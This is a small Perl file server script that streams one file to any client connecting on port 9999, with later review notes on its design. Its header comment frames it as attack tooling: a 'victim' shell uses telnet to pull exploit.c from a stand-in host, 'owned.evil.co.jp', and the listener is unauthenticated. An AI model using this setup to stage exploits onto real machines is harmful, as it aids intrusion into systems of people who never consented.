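#!/usr/bin/perl
# ---- filed.pl
# tiny file server.
# this outputs plain-text file to client, then closes the session.
# ex.) owned# ./filed.pl exploit.c
#      ...
#      victim$ telnet owned.evil.co.jp 9999 > exploit.c
#      (don't forget to remove head 3 lines!)
#
# greets to Mixter for this idea.
# White_E
# http://ttj.virtualave.net/
#
# Review notes:
#   * The listener binds INADDR_ANY and does no authentication, so every host
#     that can reach the port receives the file, unencrypted.
#   * The file name comes straight from @ARGV. It is opened with three-arg
#     open so that characters such as '|', '<' or '>' in the name are never
#     interpreted as an open mode or a command pipe.
#   * The file is re-opened for each connection, so clients always get the
#     current contents.

use strict;
use warnings;
use Socket;

my $port = 9999;

# Test definedness/length rather than truth so a file literally named "0"
# is still accepted.
my $file = $ARGV[0];
die "usage: $0 <file>\n" unless defined $file && length $file;

# A client that hangs up mid-transfer must not kill the server via SIGPIPE.
$SIG{PIPE} = 'IGNORE';

# Scalar context yields the protocol number.
my $proto = getprotobyname("tcp");
socket(my $server, PF_INET, SOCK_STREAM, $proto) || die "ERR: socket()\n";

# No autoflush is set on the listening socket (it is never written to);
# each client handle is flushed when it is closed.
my $sv_addr = sockaddr_in($port, INADDR_ANY);
bind($server, $sv_addr)    || die "ERR: bind()\n";
listen($server, SOMAXCONN) || die "ERR: listen()\n";

print "---- $0 started on $port.\n";
print "---- File: $file.\n";

# Serve one client at a time: send the whole file, then close the session.
while (my $cl = accept(my $client, $server)) {
    my ($cl_port, $cl_addr) = sockaddr_in($cl);
    my $cl_host = inet_ntoa($cl_addr);
    print "**** connected from $cl_host:$cl_port.\n";

    if (open(my $fh, '<', $file)) {
        # Read the file line by line; stop early if the client went away.
        while (my $line = <$fh>) {
            print {$client} $line or last;
        }
        close($fh);
    }
    else {
        # A file that vanished or became unreadable should not take the
        # listener down; report it and keep serving.
        warn "ERR: open(): $!\n";
    }
    close($client);
}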